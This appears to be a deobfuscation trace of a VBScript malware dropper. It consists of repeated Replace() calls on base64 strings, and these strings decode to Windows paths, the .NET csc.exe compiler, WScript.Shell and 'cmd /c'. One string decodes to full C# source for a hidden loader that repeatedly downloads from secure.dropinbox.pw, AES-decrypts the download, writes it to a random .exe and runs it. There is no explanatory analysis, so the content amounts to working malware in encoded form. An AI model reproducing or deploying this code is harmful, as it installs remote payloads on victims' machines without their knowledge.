JVdJTkRJUiU= Replace("WEUxcFkzSnZjMjltZEM1T1JWUmNSbkpoYldWM2IzSnJYSFkwTGpBdU16QXpNVGxjWTNOakxtVjRaUT09"," ","") -> WEUxcFkzSnZjMjltZEM1T1JWUmNSbkpoYldWM2IzSnJYSFkwTGpBdU16QXpNVGxjWTNOakxtVjRaUT09 Replace("XE1pY3Jvc29mdC5ORVRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcY3NjLmV4ZQ=="," ","") -> XE1pY3Jvc29mdC5ORVRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcY3NjLmV4ZQ== Replace("TDNSaGNtZGxkRHAzYVc1bGVHVWdMMjkxZERvaQ=="," ","") -> TDNSaGNtZGxkRHAzYVc1bGVHVWdMMjkxZERvaQ== Replace("L3RhcmdldDp3aW5leGUgL291dDoi"," ","") -> L3RhcmdldDp3aW5leGUgL291dDoi Replace("IiAi"," ","") -> IiAi Replace("Ig=="," ","") -> Ig== Replace("VTJOeWFYQjBhVzVuTGtacGJHVlRlWE4wWlcxUFltcGxZM1E9"," ","") -> VTJOeWFYQjBhVzVuTGtacGJHVlRlWE4wWlcxUFltcGxZM1E9 Replace("U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q="," ","") -> U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q= Replace("dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7DQp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7DQp1c2luZyBTeXN0ZW0uSU87DQp1c2luZyBTeXN0ZW0uTmV0Ow0KdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0KdXNpbmcgU3lzdGVtLlRocmVhZGluZzsNCnVzaW5nIFN5c3RlbS5XaW5kb3dzLkZvcm1zOw0KDQpjbGFzcyBQDQp7DQogICAgc3RhdGljIEZvcm0gZnJtOw0KICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgIHsNCiAgICAgICAgQXBwbGljYXRpb24uRW5hYmxlVmlzdWFsU3R5bGVzKCk7DQogICAgICAgIFRocmVhZC5TbGVlcCgzMDAwMCk7DQogICAgICAgIGZybSA9IG5ldyBGb3JtKCk7DQogICAgICAgIGZybS5PcGFjaXR5ID0gMDsNCiAgICAgICAgZnJtLlNob3dJblRhc2tiYXIgPSBmYWxzZTsNCiAgICAgICAgZnJtLldpbmRvd1N0YXRlID0gRm9ybVdpbmRvd1N0YXRlLk1pbmltaXplZDsNCiAgICAgICAgZnJtLlNob3duICs9IGZzOw0KICAgICAgICBBcHBsaWNhdGlvbi5SdW4oZnJtKTsNCiAgICB9DQogICAgc3RhdGljIHZvaWQgT3BlcmF0dXIob2JqZWN0IG8pDQogICAgew0KCQl3aGlsZSh0cnVlKQ0KICAgICAgICB0cnkNCiAgICAgICAgeyANCgkJCWJ5dGVbXSByYXdCeXRlcyA9IG51bGw7DQoJCQl3aGlsZSAocmF3Qnl0ZXMgPT0gbnVsbCB8fCByYXdCeXRlcy5MZW5ndGggPCAyMDQ4KQ0KICAgICAgICAgICAgeyAgICANCgkJCQl0cnkgeyB1c2luZyAoV2ViQ2xpZW50IHdjID0gbmV3IFdlYkNsaWVudCgpKXJhd0J5dGVzID0gd2MuRG93bmxvYWREYXRhKCJodHRwOi8vc2VjdXJlLmRyb3BpbmJveC5wdzo0NDMiKTsgfQ0KICAgICAgICAgICAgICAgIGNhdGNoIHsgfQ0KCQkJCVN5c3RlbS5UaHJlYWRpbmcuVGhyZWFkLlNsZWVwKDE1MDAwKTsNCgkJCX0NCgkJCXN0cmluZyBwYXRoID0gUGF0aC5DaGFuZ2VFeHRlbnNpb24oUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLCIuZXhlIik7DQogICAgICAgICAgICBMaXN0PGJ5dGU+IGxCeXRlcyA9IG5ldyBMaXN0PGJ5dGU+KCk7DQoJCQlieXRlW10gcERhdGEgPSBQcm9jZXNzRGF0YShyYXdCeXRlcywgRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiMjAxNWE5ZjYtMGU5MS00MTFjLWI4M2MtZGYyMzJkNjhkNjgxIikpOw0KCQkJaWYoQml0Q29udmVydGVyLlRvVUludDE2KHBEYXRhLCAwKSAhPSAweDVhNGQpDQoJCQl7DQoJCQkJcmF3Qnl0ZXMgPSBuZXcgYnl0ZVswXTsNCgkJCQl0aHJvdyBuZXcgRXhjZXB0aW9uKCk7DQoJCQl9DQogICAgICAgICAgICBsQnl0ZXMuQWRkUmFuZ2UocERhdGEpOw0KICAgICAgICAgICAgbEJ5dGVzLkFkZFJhbmdlKEd1aWQuTmV3R3VpZCgpLlRvQnl0ZUFycmF5KCkpOw0KICAgICAgICAgICAgRmlsZS5Xcml0ZUFsbEJ5dGVzKHBhdGgsIGxCeXRlcy5Ub0FycmF5KCkpOw0KICAgICAgICAgICAgUHJvY2Vzcy5TdGFydChwYXRoKTsNCgkJCWJyZWFrOw0KICAgICAgICB9DQogICAgICAgIGNhdGNoIHsgfQ0KDQogICAgICAgIHRyeSB7IGZybS5JbnZva2UobmV3IE1ldGhvZEludm9rZXIoZikpOyB9DQogICAgICAgIGNhdGNoIHsgfQ0KICAgIH0NCiAgICBzdGF0aWMgdm9pZCBmKCkgeyBmcm0uQ2xvc2UoKTsgfQ0KICAgIHN0YXRpYyB2b2lkIGZzKG9iamVjdCBzZW5kZXIsIEV2ZW50QXJncyBlKQ0KICAgIHsgVGhyZWFkUG9vbC5RdWV1ZVVzZXJXb3JrSXRlbShPcGVyYXR1cik7IH0NCiAgICBzdGF0aWMgYnl0ZVtdIFByb2Nlc3NEYXRhKGJ5dGVbXSBhcnIsIGJ5dGVbXSBwZXBwZXIpDQogICAgew0KICAgICAgICBieXRlW10gb3V0cHV0Ow0KICAgICAgICBieXRlW10gc2FsdEJ5dGVzID0gRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiZTU2OTkyNjAtNWJmZS00Y2NhLThiZmMtMjQyODc0ODYwYzYxIik7DQogICAgICAgIHVzaW5nIChNZW1vcnlTdHJlYW0gbXMgPSBuZXcgTWVtb3J5U3RyZWFtKCkpDQogICAgICAgIHVzaW5nIChSaWpuZGFlbE1hbmFnZWQgcmlqID0gbmV3IFJpam5kYWVsTWFuYWdlZCgpKSB7IHJpai5LZXlTaXplID0gMjU2OyByaWouQmxvY2tTaXplID0gMTI4OyBSZmMyODk4RGVyaXZlQnl0ZXMga2V5ID0gbmV3IFJmYzI4OThEZXJpdmVCeXRlcyhwZXBwZXIsIHNhbHRCeXRlcywgMTAwKTsgcmlqLktleSA9IGtleS5HZXRCeXRlcyhyaWouS2V5U2l6ZSAvIDgpOyByaWouSVYgPSBrZXkuR2V0Qnl0ZXMocmlqLkJsb2NrU2l6ZSAvIDgpOyByaWouTW9kZSA9IENpcGhlck1vZGUuQ0JDOyB1c2luZyAoQ3J5cHRvU3RyZWFtIGNzID0gbmV3IENyeXB0b1N0cmVhbShtcywgcmlqLkNyZWF0ZURlY3J5cHRvcigpLCBDcnlwdG9TdHJlYW1Nb2RlLldyaXRlKSkgY3MuV3JpdGUoYXJyLCAwLCBhcnIuTGVuZ3RoKTsgb3V0cHV0ID0gbXMuVG9BcnJheSgpOyB9IHJldHVybiBvdXRwdXQ7DQogICAgfQ0KfQ=="," ","") -> dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7DQp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7DQp1c2luZyBTeXN0ZW0uSU87DQp1c2luZyBTeXN0ZW0uTmV0Ow0KdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0KdXNpbmcgU3lzdGVtLlRocmVhZGluZzsNCnVzaW5nIFN5c3RlbS5XaW5kb3dzLkZvcm1zOw0KDQpjbGFzcyBQDQp7DQogICAgc3RhdGljIEZvcm0gZnJtOw0KICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgIHsNCiAgICAgICAgQXBwbGljYXRpb24uRW5hYmxlVmlzdWFsU3R5bGVzKCk7DQogICAgICAgIFRocmVhZC5TbGVlcCgzMDAwMCk7DQogICAgICAgIGZybSA9IG5ldyBGb3JtKCk7DQogICAgICAgIGZybS5PcGFjaXR5ID0gMDsNCiAgICAgICAgZnJtLlNob3dJblRhc2tiYXIgPSBmYWxzZTsNCiAgICAgICAgZnJtLldpbmRvd1N0YXRlID0gRm9ybVdpbmRvd1N0YXRlLk1pbmltaXplZDsNCiAgICAgICAgZnJtLlNob3duICs9IGZzOw0KICAgICAgICBBcHBsaWNhdGlvbi5SdW4oZnJtKTsNCiAgICB9DQogICAgc3RhdGljIHZvaWQgT3BlcmF0dXIob2JqZWN0IG8pDQogICAgew0KCQl3aGlsZSh0cnVlKQ0KICAgICAgICB0cnkNCiAgICAgICAgeyANCgkJCWJ5dGVbXSByYXdCeXRlcyA9IG51bGw7DQoJCQl3aGlsZSAocmF3Qnl0ZXMgPT0gbnVsbCB8fCByYXdCeXRlcy5MZW5ndGggPCAyMDQ4KQ0KICAgICAgICAgICAgeyAgICANCgkJCQl0cnkgeyB1c2luZyAoV2ViQ2xpZW50IHdjID0gbmV3IFdlYkNsaWVudCgpKXJhd0J5dGVzID0gd2MuRG93bmxvYWREYXRhKCJodHRwOi8vc2VjdXJlLmRyb3BpbmJveC5wdzo0NDMiKTsgfQ0KICAgICAgICAgICAgICAgIGNhdGNoIHsgfQ0KCQkJCVN5c3RlbS5UaHJlYWRpbmcuVGhyZWFkLlNsZWVwKDE1MDAwKTsNCgkJCX0NCgkJCXN0cmluZyBwYXRoID0gUGF0aC5DaGFuZ2VFeHRlbnNpb24oUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLCIuZXhlIik7DQogICAgICAgICAgICBMaXN0PGJ5dGU+IGxCeXRlcyA9IG5ldyBMaXN0PGJ5dGU+KCk7DQoJCQlieXRlW10gcERhdGEgPSBQcm9jZXNzRGF0YShyYXdCeXRlcywgRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiMjAxNWE5ZjYtMGU5MS00MTFjLWI4M2MtZGYyMzJkNjhkNjgxIikpOw0KCQkJaWYoQml0Q29udmVydGVyLlRvVUludDE2KHBEYXRhLCAwKSAhPSAweDVhNGQpDQoJCQl7DQoJCQkJcmF3Qnl0ZXMgPSBuZXcgYnl0ZVswXTsNCgkJCQl0aHJvdyBuZXcgRXhjZXB0aW9uKCk7DQoJCQl9DQogICAgICAgICAgICBsQnl0ZXMuQWRkUmFuZ2UocERhdGEpOw0KICAgICAgICAgICAgbEJ5dGVzLkFkZFJhbmdlKEd1aWQuTmV3R3VpZCgpLlRvQnl0ZUFycmF5KCkpOw0KICAgICAgICAgICAgRmlsZS5Xcml0ZUFsbEJ5dGVzKHBhdGgsIGxCeXRlcy5Ub0FycmF5KCkpOw0KICAgICAgICAgICAgUHJvY2Vzcy5TdGFydChwYXRoKTsNCgkJCWJyZWFrOw0KICAgICAgICB9DQogICAgICAgIGNhdGNoIHsgfQ0KDQogICAgICAgIHRyeSB7IGZybS5JbnZva2UobmV3IE1ldGhvZEludm9rZXIoZikpOyB9DQogICAgICAgIGNhdGNoIHsgfQ0KICAgIH0NCiAgICBzdGF0aWMgdm9pZCBmKCkgeyBmcm0uQ2xvc2UoKTsgfQ0KICAgIHN0YXRpYyB2b2lkIGZzKG9iamVjdCBzZW5kZXIsIEV2ZW50QXJncyBlKQ0KICAgIHsgVGhyZWFkUG9vbC5RdWV1ZVVzZXJXb3JrSXRlbShPcGVyYXR1cik7IH0NCiAgICBzdGF0aWMgYnl0ZVtdIFByb2Nlc3NEYXRhKGJ5dGVbXSBhcnIsIGJ5dGVbXSBwZXBwZXIpDQogICAgew0KICAgICAgICBieXRlW10gb3V0cHV0Ow0KICAgICAgICBieXRlW10gc2FsdEJ5dGVzID0gRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiZTU2OTkyNjAtNWJmZS00Y2NhLThiZmMtMjQyODc0ODYwYzYxIik7DQogICAgICAgIHVzaW5nIChNZW1vcnlTdHJlYW0gbXMgPSBuZXcgTWVtb3J5U3RyZWFtKCkpDQogICAgICAgIHVzaW5nIChSaWpuZGFlbE1hbmFnZWQgcmlqID0gbmV3IFJpam5kYWVsTWFuYWdlZCgpKSB7IHJpai5LZXlTaXplID0gMjU2OyByaWouQmxvY2tTaXplID0gMTI4OyBSZmMyODk4RGVyaXZlQnl0ZXMga2V5ID0gbmV3IFJmYzI4OThEZXJpdmVCeXRlcyhwZXBwZXIsIHNhbHRCeXRlcywgMTAwKTsgcmlqLktleSA9IGtleS5HZXRCeXRlcyhyaWouS2V5U2l6ZSAvIDgpOyByaWouSVYgPSBrZXkuR2V0Qnl0ZXMocmlqLkJsb2NrU2l6ZSAvIDgpOyByaWouTW9kZSA9IENpcGhlck1vZGUuQ0JDOyB1c2luZyAoQ3J5cHRvU3RyZWFtIGNzID0gbmV3IENyeXB0b1N0cmVhbShtcywgcmlqLkNyZWF0ZURlY3J5cHRvcigpLCBDcnlwdG9TdHJlYW1Nb2RlLldyaXRlKSkgY3MuV3JpdGUoYXJyLCAwLCBhcnIuTGVuZ3RoKTsgb3V0cHV0ID0gbXMuVG9BcnJheSgpOyB9IHJldHVybiBvdXRwdXQ7DQogICAgfQ0KfQ== Replace("WTIxa0lDOWpJQT09"," ","") -> WTIxa0lDOWpJQT09 Replace("Y21kIC9jIA=="," ","") -> Y21kIC9jIA== |
vbCrLf | |
Replace | Replace("VjFOamNtbHdkQzVUYUdWc2JBPT0="," ","") -> VjFOamNtbHdkQzVUYUdWc2JBPT0= Replace("V1NjcmlwdC5TaGVsbA=="," ","") -> V1NjcmlwdC5TaGVsbA== Replace("VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09"," ","") -> VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09 Replace("U2xWR1VWVkZVa0pXUlVWcw=="," ","") -> U2xWR1VWVkZVa0pXUlVWcw== Replace("SlVGUVVFUkJWRUVs"," ","") -> SlVGUVVFUkJWRUVs Replace("JUFQUERBVEEl"," ","") -> JUFQUERBVEEl Replace("V0VVeGNGa3pTblpqTWpsdFpFWjNQUT09"," ","") -> V0VVeGNGa3pTblpqTWpsdFpFWjNQUT09 Replace("WEUxcFkzSnZjMjltZEZ3PQ=="," ","") -> WEUxcFkzSnZjMjltZEZ3PQ== Replace("XE1pY3Jvc29mdFw="," ","") -> XE1pY3Jvc29mdFw= Replace("TG1WNFpRPT0="," ","") -> TG1WNFpRPT0= Replace("LmV4ZQ=="," ","") -> LmV4ZQ== Replace("TG1Oeg=="," ","") -> TG1Oeg== Replace("LmNz"," ","") -> LmNz Replace("U2xaa1NsUnJVa3BWYVZVOQ=="," ","") -> U2xaa1NsUnJVa3BWYVZVOQ== Replace("SlZkSlRrUkpVaVU9"," ","") -> SlZkSlRrUkpVaVU9 Replace("JVdJTkRJUiU="," ","") -> JVdJTkRJUiU= Replace("WEUxcFkzSnZjMjltZEM1T1JWUmNSbkpoYldWM2IzSnJYSFkwTGpBdU16QXpNVGxjWTNOakxtVjRaUT09"," ","") -> WEUxcFkzSnZjMjltZEM1T1JWUmNSbkpoYldWM2IzSnJYSFkwTGpBdU16QXpNVGxjWTNOakxtVjRaUT09 Replace("XE1pY3Jvc29mdC5ORVRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcY3NjLmV4ZQ=="," ","") -> XE1pY3Jvc29mdC5ORVRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcY3NjLmV4ZQ== Replace("TDNSaGNtZGxkRHAzYVc1bGVHVWdMMjkxZERvaQ=="," ","") -> TDNSaGNtZGxkRHAzYVc1bGVHVWdMMjkxZERvaQ== Replace("L3RhcmdldDp3aW5leGUgL291dDoi"," ","") -> L3RhcmdldDp3aW5leGUgL291dDoi Replace("IiAi"," ","") -> IiAi Replace("Ig=="," ","") -> Ig== Replace("VTJOeWFYQjBhVzVuTGtacGJHVlRlWE4wWlcxUFltcGxZM1E9"," ","") -> VTJOeWFYQjBhVzVuTGtacGJHVlRlWE4wWlcxUFltcGxZM1E9 Replace("U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q="," ","") -> U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q= Replace("dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7DQp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7DQp1c2luZyBTeXN0ZW0uSU87DQp1c2luZyBTeXN0ZW0uTmV0Ow0KdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0KdXNpbmcgU3lzdGVtLlRocmVhZGluZzsNCnVzaW5nIFN5c3RlbS5XaW5kb3dzLkZvcm1zOw0KDQpjbGFzcyBQDQp7DQogICAgc3RhdGljIEZvcm0gZnJtOw0KICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgIHsNCiAgICAgICAgQXBwbGljYXRpb24uRW5hYmxlVmlzdWFsU3R5bGVzKCk7DQogICAgICAgIFRocmVhZC5TbGVlcCgzMDAwMCk7DQogICAgICAgIGZybSA9IG5ldyBGb3JtKCk7DQogICAgICAgIGZybS5PcGFjaXR5ID0gMDsNCiAgICAgICAgZnJtLlNob3dJblRhc2tiYXIgPSBmYWxzZTsNCiAgICAgICAgZnJtLldpbmRvd1N0YXRlID0gRm9ybVdpbmRvd1N0YXRlLk1pbmltaXplZDsNCiAgICAgICAgZnJtLlNob3duICs9IGZzOw0KICAgICAgICBBcHBsaWNhdGlvbi5SdW4oZnJtKTsNCiAgICB9DQogICAgc3RhdGljIHZvaWQgT3BlcmF0dXIob2JqZWN0IG8pDQogICAgew0KCQl3aGlsZSh0cnVlKQ0KICAgICAgICB0cnkNCiAgICAgICAgeyANCgkJCWJ5dGVbXSByYXdCeXRlcyA9IG51bGw7DQoJCQl3aGlsZSAocmF3Qnl0ZXMgPT0gbnVsbCB8fCByYXdCeXRlcy5MZW5ndGggPCAyMDQ4KQ0KICAgICAgICAgICAgeyAgICANCgkJCQl0cnkgeyB1c2luZyAoV2ViQ2xpZW50IHdjID0gbmV3IFdlYkNsaWVudCgpKXJhd0J5dGVzID0gd2MuRG93bmxvYWREYXRhKCJodHRwOi8vc2VjdXJlLmRyb3BpbmJveC5wdzo0NDMiKTsgfQ0KICAgICAgICAgICAgICAgIGNhdGNoIHsgfQ0KCQkJCVN5c3RlbS5UaHJlYWRpbmcuVGhyZWFkLlNsZWVwKDE1MDAwKTsNCgkJCX0NCgkJCXN0cmluZyBwYXRoID0gUGF0aC5DaGFuZ2VFeHRlbnNpb24oUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLCIuZXhlIik7DQogICAgICAgICAgICBMaXN0PGJ5dGU+IGxCeXRlcyA9IG5ldyBMaXN0PGJ5dGU+KCk7DQoJCQlieXRlW10gcERhdGEgPSBQcm9jZXNzRGF0YShyYXdCeXRlcywgRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiMjAxNWE5ZjYtMGU5MS00MTFjLWI4M2MtZGYyMzJkNjhkNjgxIikpOw0KCQkJaWYoQml0Q29udmVydGVyLlRvVUludDE2KHBEYXRhLCAwKSAhPSAweDVhNGQpDQoJCQl7DQoJCQkJcmF3Qnl0ZXMgPSBuZXcgYnl0ZVswXTsNCgkJCQl0aHJvdyBuZXcgRXhjZXB0aW9uKCk7DQoJCQl9DQogICAgICAgICAgICBsQnl0ZXMuQWRkUmFuZ2UocERhdGEpOw0KICAgICAgICAgICAgbEJ5dGVzLkFkZFJhbmdlKEd1aWQuTmV3R3VpZCgpLlRvQnl0ZUFycmF5KCkpOw0KICAgICAgICAgICAgRmlsZS5Xcml0ZUFsbEJ5dGVzKHBhdGgsIGxCeXRlcy5Ub0FycmF5KCkpOw0KICAgICAgICAgICAgUHJvY2Vzcy5TdGFydChwYXRoKTsNCgkJCWJyZWFrOw0KICAgICAgICB9DQogICAgICAgIGNhdGNoIHsgfQ0KDQogICAgICAgIHRyeSB7IGZybS5JbnZva2UobmV3IE1ldGhvZEludm9rZXIoZikpOyB9DQogICAgICAgIGNhdGNoIHsgfQ0KICAgIH0NCiAgICBzdGF0aWMgdm9pZCBmKCkgeyBmcm0uQ2xvc2UoKTsgfQ0KICAgIHN0YXRpYyB2b2lkIGZzKG9iamVjdCBzZW5kZXIsIEV2ZW50QXJncyBlKQ0KICAgIHsgVGhyZWFkUG9vbC5RdWV1ZVVzZXJXb3JrSXRlbShPcGVyYXR1cik7IH0NCiAgICBzdGF0aWMgYnl0ZVtdIFByb2Nlc3NEYXRhKGJ5dGVbXSBhcnIsIGJ5dGVbXSBwZXBwZXIpDQogICAgew0KICAgICAgICBieXRlW10gb3V0cHV0Ow0KICAgICAgICBieXRlW10gc2FsdEJ5dGVzID0gRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiZTU2OTkyNjAtNWJmZS00Y2NhLThiZmMtMjQyODc0ODYwYzYxIik7DQogICAgICAgIHVzaW5nIChNZW1vcnlTdHJlYW0gbXMgPSBuZXcgTWVtb3J5U3RyZWFtKCkpDQogICAgICAgIHVzaW5nIChSaWpuZGFlbE1hbmFnZWQgcmlqID0gbmV3IFJpam5kYWVsTWFuYWdlZCgpKSB7IHJpai5LZXlTaXplID0gMjU2OyByaWouQmxvY2tTaXplID0gMTI4OyBSZmMyODk4RGVyaXZlQnl0ZXMga2V5ID0gbmV3IFJmYzI4OThEZXJpdmVCeXRlcyhwZXBwZXIsIHNhbHRCeXRlcywgMTAwKTsgcmlqLktleSA9IGtleS5HZXRCeXRlcyhyaWouS2V5U2l6ZSAvIDgpOyByaWouSVYgPSBrZXkuR2V0Qnl0ZXMocmlqLkJsb2NrU2l6ZSAvIDgpOyByaWouTW9kZSA9IENpcGhlck1vZGUuQ0JDOyB1c2luZyAoQ3J5cHRvU3RyZWFtIGNzID0gbmV3IENyeXB0b1N0cmVhbShtcywgcmlqLkNyZWF0ZURlY3J5cHRvcigpLCBDcnlwdG9TdHJlYW1Nb2RlLldyaXRlKSkgY3MuV3JpdGUoYXJyLCAwLCBhcnIuTGVuZ3RoKTsgb3V0cHV0ID0gbXMuVG9BcnJheSgpOyB9IHJldHVybiBvdXRwdXQ7DQogICAgfQ0KfQ=="," ","") -> dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWM7DQp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7DQp1c2luZyBTeXN0ZW0uSU87DQp1c2luZyBTeXN0ZW0uTmV0Ow0KdXNpbmcgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeTsNCnVzaW5nIFN5c3RlbS5UZXh0Ow0KdXNpbmcgU3lzdGVtLlRocmVhZGluZzsNCnVzaW5nIFN5c3RlbS5XaW5kb3dzLkZvcm1zOw0KDQpjbGFzcyBQDQp7DQogICAgc3RhdGljIEZvcm0gZnJtOw0KICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgIHsNCiAgICAgICAgQXBwbGljYXRpb24uRW5hYmxlVmlzdWFsU3R5bGVzKCk7DQogICAgICAgIFRocmVhZC5TbGVlcCgzMDAwMCk7DQogICAgICAgIGZybSA9IG5ldyBGb3JtKCk7DQogICAgICAgIGZybS5PcGFjaXR5ID0gMDsNCiAgICAgICAgZnJtLlNob3dJblRhc2tiYXIgPSBmYWxzZTsNCiAgICAgICAgZnJtLldpbmRvd1N0YXRlID0gRm9ybVdpbmRvd1N0YXRlLk1pbmltaXplZDsNCiAgICAgICAgZnJtLlNob3duICs9IGZzOw0KICAgICAgICBBcHBsaWNhdGlvbi5SdW4oZnJtKTsNCiAgICB9DQogICAgc3RhdGljIHZvaWQgT3BlcmF0dXIob2JqZWN0IG8pDQogICAgew0KCQl3aGlsZSh0cnVlKQ0KICAgICAgICB0cnkNCiAgICAgICAgeyANCgkJCWJ5dGVbXSByYXdCeXRlcyA9IG51bGw7DQoJCQl3aGlsZSAocmF3Qnl0ZXMgPT0gbnVsbCB8fCByYXdCeXRlcy5MZW5ndGggPCAyMDQ4KQ0KICAgICAgICAgICAgeyAgICANCgkJCQl0cnkgeyB1c2luZyAoV2ViQ2xpZW50IHdjID0gbmV3IFdlYkNsaWVudCgpKXJhd0J5dGVzID0gd2MuRG93bmxvYWREYXRhKCJodHRwOi8vc2VjdXJlLmRyb3BpbmJveC5wdzo0NDMiKTsgfQ0KICAgICAgICAgICAgICAgIGNhdGNoIHsgfQ0KCQkJCVN5c3RlbS5UaHJlYWRpbmcuVGhyZWFkLlNsZWVwKDE1MDAwKTsNCgkJCX0NCgkJCXN0cmluZyBwYXRoID0gUGF0aC5DaGFuZ2VFeHRlbnNpb24oUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLCIuZXhlIik7DQogICAgICAgICAgICBMaXN0PGJ5dGU+IGxCeXRlcyA9IG5ldyBMaXN0PGJ5dGU+KCk7DQoJCQlieXRlW10gcERhdGEgPSBQcm9jZXNzRGF0YShyYXdCeXRlcywgRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiMjAxNWE5ZjYtMGU5MS00MTFjLWI4M2MtZGYyMzJkNjhkNjgxIikpOw0KCQkJaWYoQml0Q29udmVydGVyLlRvVUludDE2KHBEYXRhLCAwKSAhPSAweDVhNGQpDQoJCQl7DQoJCQkJcmF3Qnl0ZXMgPSBuZXcgYnl0ZVswXTsNCgkJCQl0aHJvdyBuZXcgRXhjZXB0aW9uKCk7DQoJCQl9DQogICAgICAgICAgICBsQnl0ZXMuQWRkUmFuZ2UocERhdGEpOw0KICAgICAgICAgICAgbEJ5dGVzLkFkZFJhbmdlKEd1aWQuTmV3R3VpZCgpLlRvQnl0ZUFycmF5KCkpOw0KICAgICAgICAgICAgRmlsZS5Xcml0ZUFsbEJ5dGVzKHBhdGgsIGxCeXRlcy5Ub0FycmF5KCkpOw0KICAgICAgICAgICAgUHJvY2Vzcy5TdGFydChwYXRoKTsNCgkJCWJyZWFrOw0KICAgICAgICB9DQogICAgICAgIGNhdGNoIHsgfQ0KDQogICAgICAgIHRyeSB7IGZybS5JbnZva2UobmV3IE1ldGhvZEludm9rZXIoZikpOyB9DQogICAgICAgIGNhdGNoIHsgfQ0KICAgIH0NCiAgICBzdGF0aWMgdm9pZCBmKCkgeyBmcm0uQ2xvc2UoKTsgfQ0KICAgIHN0YXRpYyB2b2lkIGZzKG9iamVjdCBzZW5kZXIsIEV2ZW50QXJncyBlKQ0KICAgIHsgVGhyZWFkUG9vbC5RdWV1ZVVzZXJXb3JrSXRlbShPcGVyYXR1cik7IH0NCiAgICBzdGF0aWMgYnl0ZVtdIFByb2Nlc3NEYXRhKGJ5dGVbXSBhcnIsIGJ5dGVbXSBwZXBwZXIpDQogICAgew0KICAgICAgICBieXRlW10gb3V0cHV0Ow0KICAgICAgICBieXRlW10gc2FsdEJ5dGVzID0gRW5jb2RpbmcuVVRGOC5HZXRCeXRlcygiZTU2OTkyNjAtNWJmZS00Y2NhLThiZmMtMjQyODc0ODYwYzYxIik7DQogICAgICAgIHVzaW5nIChNZW1vcnlTdHJlYW0gbXMgPSBuZXcgTWVtb3J5U3RyZWFtKCkpDQogICAgICAgIHVzaW5nIChSaWpuZGFlbE1hbmFnZWQgcmlqID0gbmV3IFJpam5kYWVsTWFuYWdlZCgpKSB7IHJpai5LZXlTaXplID0gMjU2OyByaWouQmxvY2tTaXplID0gMTI4OyBSZmMyODk4RGVyaXZlQnl0ZXMga2V5ID0gbmV3IFJmYzI4OThEZXJpdmVCeXRlcyhwZXBwZXIsIHNhbHRCeXRlcywgMTAwKTsgcmlqLktleSA9IGtleS5HZXRCeXRlcyhyaWouS2V5U2l6ZSAvIDgpOyByaWouSVYgPSBrZXkuR2V0Qnl0ZXMocmlqLkJsb2NrU2l6ZSAvIDgpOyByaWouTW9kZSA9IENpcGhlck1vZGUuQ0JDOyB1c2luZyAoQ3J5cHRvU3RyZWFtIGNzID0gbmV3IENyeXB0b1N0cmVhbShtcywgcmlqLkNyZWF0ZURlY3J5cHRvcigpLCBDcnlwdG9TdHJlYW1Nb2RlLldyaXRlKSkgY3MuV3JpdGUoYXJyLCAwLCBhcnIuTGVuZ3RoKTsgb3V0cHV0ID0gbXMuVG9BcnJheSgpOyB9IHJldHVybiBvdXRwdXQ7DQogICAgfQ0KfQ== Replace("WTIxa0lDOWpJQT09"," ","") -> WTIxa0lDOWpJQT09 Replace("Y21kIC9jIA=="," ","") -> Y21kIC9jIA== |
vbTab | |
Replace | Replace("VjFOamNtbHdkQzVUYUdWc2JBPT0="," ","") -> VjFOamNtbHdkQzVUYUdWc2JBPT0= Replace("V1NjcmlwdC5TaGVsbA=="," ","") -> V1NjcmlwdC5TaGVsbA== Replace("VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09"," ","") -> VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09 Replace("U2xWR1VWVkZVa0pXUlVWcw=="," ","") -> U2xWR1VWVkZVa0pXUlVWcw== Replace("SlVGUVVFUkJWRUVs"," ","") -> SlVGUVVFUkJWRUVs Replace("JUFQUERBVEEl"," ","") -> JUFQUERBVEEl Replace("V0VVeGNGa3pTblpqTWpsdFpFWjNQUT09"," ","") -> V0VVeGNGa3pTblpqTWpsdFpFWjNQUT09 